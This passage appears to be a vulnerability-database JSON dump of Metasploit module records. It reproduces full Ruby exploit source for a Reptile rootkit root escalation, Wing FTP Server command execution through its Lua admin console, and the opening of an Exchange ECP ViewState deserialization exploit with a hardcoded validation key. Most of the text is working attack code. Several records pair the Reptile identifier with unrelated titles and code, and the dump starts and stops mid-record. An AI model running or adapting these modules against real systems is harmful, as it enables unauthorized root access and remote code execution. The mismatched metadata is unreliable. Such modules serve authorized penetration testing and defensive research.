"threatpost", "idList": ["THREATPOST:0E3D1930EBBC77714A9C3CE21AD64F6F", "THREATPOST:2DC6022D403695F55BFEFCC174FCD3F8"]}, {"type": "github", "idList": ["GHSA-G9RQ-X4FJ-F5HX"]}, {"type": "amazon", "idList": ["ALAS-2020-1353", "ALAS-2020-1352", "ALAS-2020-1351", "ALAS-2020-1350", "ALAS-2020-1349", "ALAS-2020-1348"]}], "modified": "2020-03-15T02:03:14"}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-03-15T02:03:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-15T02:03:14", "differentElements": ["sourceData"], "edition": 71}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-16T18:06:45", "history": [], "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C"]}, {"type": "kitploit", "idList": ["KITPLOIT:122074760801456355", "KITPLOIT:3064066429449697838", "KITPLOIT:1658909873428638412", "KITPLOIT:1116858433130862595"]}, {"type": "exploitdb", "idList": ["EDB-ID:48218"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0815", "ELSA-2020-5569"]}, {"type": "filippoio", "idList": ["FILIPPOIO:2B9CA65A7786D06127C3363F3391B05C"]}, {"type": "gentoo", "idList": ["GLSA-202003-32", "GLSA-202003-18", "GLSA-202003-20", "GLSA-202003-13", "GLSA-202003-12"]}, {"type": "zdt", "idList": ["1337DAY-ID-34095"]}, {"type": "cve", "idList": ["CVE-2020-10587", "CVE-2019-18576"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156730", "PACKETSTORM:156729"]}], "modified": "2020-03-16T18:06:45"}, "score": {"value": 4.0, "vector": "NONE", "modified": "2020-03-16T18:06:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-16T18:06:45", "differentElements": ["sourceData"], "edition": 72}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-16T19:57:33", "history": [], "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "f5", "idList": ["F5:K54811521"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C"]}, {"type": "kitploit", "idList": ["KITPLOIT:122074760801456355", "KITPLOIT:3064066429449697838", "KITPLOIT:1658909873428638412", "KITPLOIT:1116858433130862595"]}, {"type": "exploitdb", "idList": ["EDB-ID:48218"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0815", "ELSA-2020-5569"]}, {"type": "filippoio", "idList": ["FILIPPOIO:2B9CA65A7786D06127C3363F3391B05C"]}, {"type": "gentoo", "idList": ["GLSA-202003-32", "GLSA-202003-18", "GLSA-202003-20", "GLSA-202003-13", "GLSA-202003-12"]}, {"type": "zdt", "idList": ["1337DAY-ID-34095"]}, {"type": "cve", "idList": ["CVE-2020-10587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156730", "PACKETSTORM:156729"]}], "modified": "2020-03-16T19:57:33"}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-03-16T19:57:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-16T19:57:33", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 73}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "77c6c3c41a771860af1dcbc78d5a70d6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Wing FTP Server Authenticated Command Execution", "description": "This module exploits the embedded Lua interpreter in the admin web interface for versions 3.0.0 and above. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.\n", "published": "2014-08-29T17:42:11", "modified": "2019-02-10T06:26:13", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.wftpserver.com", "https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm"], "cvelist": [], "lastseen": "2020-03-19T10:03:51", "history": [], "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "pentestit", "idList": ["PENTESTIT:A39D8104090B480DA2F6F1E1C92FEDC9"]}, {"type": "amazon", "idList": ["ALAS-2020-1354", "ALAS-2020-1355", "ALAS-2020-1356"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0357-1"]}, {"type": "threatpost", "idList": ["THREATPOST:D0E0C49682FA9058E83A097B2A419C31"]}, {"type": "cve", "idList": ["CVE-2020-10665"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B8D47426AEDCE8026154E77DE5D7D9EB"]}, {"type": "kitploit", "idList": ["KITPLOIT:2327280505288436752"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:7CF62199FC64C18F165BED77D5301353"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-202003-36.NASL", "REDHAT-RHSA-2020-0834.NASL", "REDHAT-RHSA-2020-0815.NASL", "REDHAT-RHSA-2020-0820.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0834", "ELSA-2020-0853"]}, {"type": "coresecurity", "idList": ["CORE-2019-004"]}, {"type": "exploitdb", "idList": ["EDB-ID:48227"]}, {"type": "ubuntu", "idList": ["USN-4302-1"]}], "modified": "2020-03-19T10:03:51"}, "score": {"value": 4.1, "vector": "NONE", "modified": "2020-03-19T10:03:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/wing_ftp_admin_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Wing FTP Server Authenticated Command Execution',\n 'Description' => %q{\n This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.\n },\n 'Author' =>\n [\n 'Nicholas Nam <nick[at]executionflow.org>',\n 'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # minor improvements\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://www.wftpserver.com'],\n ['URL', 'https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm']\n ],\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Wing FTP Server >= 3.0.0', {}]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Jun 19 2014',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5466),\n OptString.new('USERNAME', [true, 'Admin username', '']),\n OptString.new('PASSWORD', [true, 'Admin password', ''])\n ], self.class\n )\n deregister_options('CMDSTAGER::FLAVOR')\n deregister_options('CMDSTAGER::DECODER')\n deregister_options('URIPATH')\n deregister_options('SRVHOST')\n deregister_options('SRVPORT')\n end\n\n @session_cookie = ''\n @version = ''\n @psh = false\n @vuln_check = false\n\n def check\n @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])\n if @session_cookie.nil?\n return CheckCode::Unknown\n end\n\n ver = send_request_cgi(\n 'uri' => '/admin_license.html',\n 'method' => 'POST',\n 'cookie' => @session_cookie,\n 'ctype' => 'text/plain;charset=UTF-8'\n )\n\n unless ver\n vprint_error(\"Connection failed!\")\n return CheckCode::Unknown\n end\n\n unless ver.code == 200 && ver.body.include?('Wing FTP Server')\n return CheckCode::Safe\n end\n\n @version = Gem::Version.new(ver.body.scan(/Wing FTP Server ([\\d\\.]+)/).flatten.first)\n print_status(\"Found Wing FTP Server #{@version}\")\n\n # Lua capabilities and administrator console were added in version 3.0.0, so everything above that is (probably) vulnerable\n unless @version >= Gem::Version.new('3.0.0')\n @vuln_check = false\n return CheckCode::Safe\n end\n\n @vuln_check = true\n winenv_path = execute_command(\"PATH\")\n\n unless winenv_path\n vprint_error(\"Connection failed!\")\n return CheckCode::Unknown\n end\n\n if winenv_path.code == 200\n winenv_path.body.split(';').each do |path_val|\n if (/powershell/i) =~ path_val\n print_good(\"Found Powershell at #{path_val}\")\n @psh = true\n end\n end\n else\n @psh = false\n end\n\n @vuln_check = false\n return CheckCode::Vulnerable\n end\n\n def exploit\n vprint_status(\"Authenticating...\")\n unless [CheckCode::Vulnerable].include? check\n fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')\n end\n\n if @psh == true\n print_status('Executing payload via PowerShell...')\n psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true)\n execute_command(psh_command)\n else\n if @version > Gem::Version.new('4.3.8')\n fail_with(Failure::NoTarget, \"Version #{@version} detected and PowerShell not found, aborting exploit attempt!\")\n end\n print_warning(\"PowerShell not found, will revert to CmdStager for payload delivery!\")\n print_status(\"Sending payload...\")\n # Execute the CmdStager, max length of the commands is ~1500\n execute_cmdstager(flavor: :vbs, linemax: 1500)\n end\n end\n\n def execute_command(cmd,_opts = {})\n # Wrap cmd with [[ ]] to prevent potential problems.\n if @vuln_check == true\n command = \"print(os.getenv([[#{cmd}]]))\"\n else\n command = \"os.execute([[#{cmd}]])\"\n end\n\n res = send_request_cgi(\n 'uri' \t\t=> '/admin_lua_script.html',\n 'method' \t\t=> 'POST',\n 'encode_params' => true,\n 'cookie' \t\t=> @session_cookie,\n 'ctype' \t\t=> 'text/plain;charset=UTF-8',\n 'vars_post' \t\t=> { 'command' => command }\n )\n\n unless res && res.code == 200\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong.\")\n end\n\n if @vuln_check\n return res\n end\n end\n\n def authenticate(username, password)\n res = send_request_cgi(\n 'uri' => '/admin_loginok.html',\n 'method' => 'POST',\n 'vars_post' => {\n 'username' => username,\n 'password' => password,\n 'username_val' => username,\n 'password_val' => password,\n 'submit_btn' => '+Login+'\n }\n )\n\n unless res\n print_error(\"#{peer} - Admin login page was unreachable.\")\n return nil\n end\n\n if res.code == 200 && res.body =~ /location='main.html\\?lang=english';/\n res.get_cookies.split(';').each do |cookie|\n cookie.split(',').each do |value|\n if value.split('=')[0] =~ /UIDADMIN/\n vprint_good(\"Authentication successful, got session cookie #{value.split('=')[1]}\")\n return res.get_cookies.split(';')[0]\n end\n end\n end\n end\n\n print_error(\"#{peer} - Authentication failed!\")\n return nil\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-19T10:03:51", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 74}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-19T13:47:15", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1907207623071471216", "KITPLOIT:2327280505288436752"]}, {"type": "pentestit", "idList": ["PENTESTIT:A39D8104090B480DA2F6F1E1C92FEDC9"]}, {"type": "amazon", "idList": ["ALAS-2020-1354", "ALAS-2020-1355", "ALAS-2020-1356"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0357-1"]}, {"type": "threatpost", "idList": ["THREATPOST:D0E0C49682FA9058E83A097B2A419C31", "THREATPOST:137E6F34D7C3406EC6D971058B66029F"]}, {"type": "cve", "idList": ["CVE-2020-10665"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B8D47426AEDCE8026154E77DE5D7D9EB"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:7CF62199FC64C18F165BED77D5301353"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0834", "ELSA-2020-0853"]}, {"type": "coresecurity", "idList": ["CORE-2019-004"]}, {"type": "ubuntu", "idList": ["USN-4302-1"]}, {"type": "nessus", "idList": ["SL_20200317_PYTHON_PIP_ON_SL7_X.NASL", "SL_20200317_TOMCAT_ON_SL7_X.NASL", "GENTOO_GLSA-202003-34.NASL"]}], "modified": "2020-03-19T13:47:15"}, "score": {"value": 4.5, "vector": "NONE", "modified": "2020-03-19T13:47:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-19T13:47:15", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 75}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "fbb0081e92ebf0bba002fbb19d7b4f2c", "type": "metasploit", "bulletinFamily": "exploit", "title": "Exchange Control Panel ViewState Deserialization", "description": "This module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. With knowledge of these, values an attacker can craft a special ViewState to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n", "published": "2020-02-28T02:57:08", "modified": "2020-03-12T17:26:01", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688", "https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"], "cvelist": ["CVE-2020-0688"], "lastseen": "2020-03-24T18:00:07", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-0688"]}, {"type": "threatpost", "idList": ["THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55"]}, {"type": "zdt", "idList": ["1337DAY-ID-34037", "1337DAY-ID-34051"]}, {"type": "exploitdb", "idList": ["EDB-ID:48153", "EDB-ID:48168"]}, {"type": "mskb", "idList": ["KB4536989", "KB4536988", "KB4536987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156620", "PACKETSTORM:156592"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_FEB_EXCHANGE.NASL"]}, {"type": "avleonov", "idList": ["AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813"]}, {"type": "krebs", "idList": ["KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:95DEE0244F6DE332977BB606555E5A3C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6"]}], "modified": "2020-03-24T18:00:07"}, "score": {"value": 4.8, "vector": "NONE", "modified": "2020-03-24T18:00:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_ecp_viewstate.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'bindata'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n # include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Exchange Control Panel ViewState Deserialization',\n 'Description' => %q{\n This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. With knowledge of these, values an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n },\n 'Author' => 'Spencer McIntyre',\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', 